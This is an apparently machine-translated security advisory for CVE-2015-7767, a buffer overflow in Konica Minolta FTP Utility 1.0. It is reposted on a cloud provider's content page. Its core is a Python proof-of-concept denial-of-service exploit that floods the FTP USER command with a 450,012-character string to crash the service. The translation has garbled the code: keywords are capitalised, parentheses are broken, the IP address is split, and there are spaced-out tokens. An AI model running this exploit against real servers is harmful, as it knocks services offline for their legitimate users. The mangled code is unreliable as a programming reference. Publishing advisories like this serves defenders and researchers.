Konica Minolta FTP Utility Denial of Service Vulnerability (CVE-2015-7767)

Source: Internet
Author: User
Tags remote ftp server konica minolta cve

Konica Minolta FTP Utility Denial of Service Vulnerability (CVE-2015-7767)
Konica Minolta FTP Utility Denial of Service Vulnerability (CVE-2015-7767)

Release date:
Updated on:

Affected Systems:

konicaminolta FTP Utility 1.0


CVE (CAN) ID: CVE-2015-7767

Konica minolta ftp Utility is a software used by the konica minolta photocopier. It can directly transfer the scanning software to the computer.

Konica Minolta FTP Utility 1.0 has a buffer overflow vulnerability. A remote attacker can exploit this vulnerability to cause a denial of service (application crash) through a long USER command ).

<* Source: Shankar Damodaran

Test method:


The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Shankar Damodaran () provides the following test methods:

#! /Usr/bin/python
# Exploit Title: Konica Minolta FTP Utility 1.0 Remote DoS PoC
# Date: 21-08-2015
# Exploit Author: Shankar Damodaran
# Vendor Homepage: http://www.konicaminolta.com/
# Software Link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
# Version: 1.0
# Tested on: Microsoft Windows XP Professional SP3 English

Import socket

# The ip address of the remote host
Ftphost = '192. 168.1.7'
# The port of the remote host
Ftpport = 21

# Fuzzed packet of a certain length, Appending this to the USER command and requesting the remote ftp server denies requests for other legitimate users.
Crafted_user_name = "B" * 450012 # DoS

# Establishing connection
S = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
Connect = s. connect (ftphost, ftpport ))
S. recv (1024)

# Sending the edevil input.
S. send ('user' + crafted_user_name + '\ r \ n ')

# Once the packet has been sent, the DoS will occur on the remote FTP server. by sending an interrupt through (Ctrl + C), will resume the FTP server from DoS. (Note: The FTP server will not get crashed)
S. send ('Quit \ r \ n ')
S. close ()

# End of PoC-Shankar Damodaran


Vendor patch:

Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:


This article permanently updates the link address:

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.